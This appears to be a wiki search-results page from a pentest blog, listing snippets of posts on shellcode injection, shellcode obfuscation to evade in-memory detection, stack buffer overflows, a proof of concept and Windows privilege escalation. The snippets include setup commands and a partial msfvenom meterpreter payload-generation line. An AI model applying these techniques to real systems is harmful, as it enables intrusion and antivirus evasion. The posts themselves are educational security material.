NoSociety.de

Unten sind die Ergebnisse Ihrer Suche gelistet.

Passende Seitennamen:

Volltextergebnisse:

Obfuscation: polymorphic in-memory decoder: 103 Treffer, Zuletzt geändert: vor 9 Monaten; abilities. [[en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen|In the last part]] we looked at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was recognised in memory and blocked. We now want to solve t
Shellcode Injection Part 4: 70 Treffer, Zuletzt geändert: vor 10 Monaten; y Windows Kali pentest blog english}} ====== Shellcode Injection Part 4 ====== {{it-security:blog:sc4-h... |}} In this article, we will only deal with shellcode obfuscation in passing. At this point, I wanted to develop a custom shellcode to learn more about how it works. The following ... of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ===== Preparations ===== =
Obfuscation: ByteSwapping: 61 Treffer, Zuletzt geändert: vor 7 Monaten; {{tag>IT-Security Windows Kali shellcode blog english}} ====== Obfuscation: ByteSwapping ====== {{it-s... In the last post, I decrypted an encrypted shellcode in the working memory and had it executed. As enc... m into the encryption to make decrypting the shellcode a little more difficult. \\ \\ ===== Preliminary ... %%''|''%%F9%%''|''%%12%%''|''%%D1%%''| ===== The code ===== ==== Step 1: Python Encoder ==== The corr
Shellcode Injection Part 1: 59 Treffer, Zuletzt geändert: vor 11 Monaten; y windows kali pentest blog english}} ====== Shellcode Injection Part 1 ====== In this series of articles, we look at shellcode, how to inject it into processes and some techniq... In the first part, we look at how to inject shellcode from a local process. ausführt. In addition, we d... required files in the [[en:it-security:blog:shellcode_injection-1#Repository|repository]] \\ \\ ===== G
Shellcode Injection Part 3: 47 Treffer, Zuletzt geändert: vor 12 Monaten; y Windows Kali pentest blog english}} ====== Shellcode Injection Part 3 ====== {{it-security:blog:shellcode-part-3.png?400|}} Shellcode injections are generally used to initiate a reverse shell. However, in some circumstances it may be necessary to load the code for the shell in the second step. In this blog p
Buffer overflow in the 64-bit stack - part 1: 43 Treffer, Zuletzt geändert: vor 11 Monaten; ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Shellcode Injection Part 2: 43 Treffer, Zuletzt geändert: vor 11 Monaten; y windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-security:blog:shellcode-part2.jpg?600|}} In part 1 of the shellcode injection series, we started a reverse shell from a local process. In part 2, we inject the shellcode directly into a process. This form of injection i
Buffer overflow in the 64-bit stack - Part 3: 40 Treffer, Zuletzt geändert: vor 10 Monaten; ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Obfuscation: Disguise shellcode as UUIDs: 33 Treffer, Zuletzt geändert: vor 10 Monaten; blog english}} ====== Obfuscation: Disguise shellcode as UUIDs ====== {{it-security:blog:a3896ce4-2725... 00x200|}} In the last [[en:it-security:blog:shellcode_injection-4|blog post]] we dealt with the development of a calc.exe shellcode. The injection method that I used for testing was... der. I therefore had to adapt the loader and shellcode accordingly. I came up with the idea of converti
Buffer overflow in the 64-bit stack - Part 2: 23 Treffer, Zuletzt geändert: vor 10 Monaten; 80568|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
FatCat Attack PoC: 14 Treffer, Zuletzt geändert: vor 17 Monaten; rity pentest}} ====== FatCat Attack PoC ====== <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> | @orange:This PoC is for demonstration and tra... payload ==== * Start Metasploit * Open cmd <code dos>cmd</code> * Generate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterprete
Privilege escalation: Windows admin thanks to Linux: 12 Treffer, Zuletzt geändert: vor 10 Monaten; ntpw ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find Windows partition ==== We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In our examp
obfuscation_shellcode_als_uuids_tarnen_-_teil_1: 1 Treffer, Zuletzt geändert: vor 10 Monaten; ~~REDIRECT>en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen~~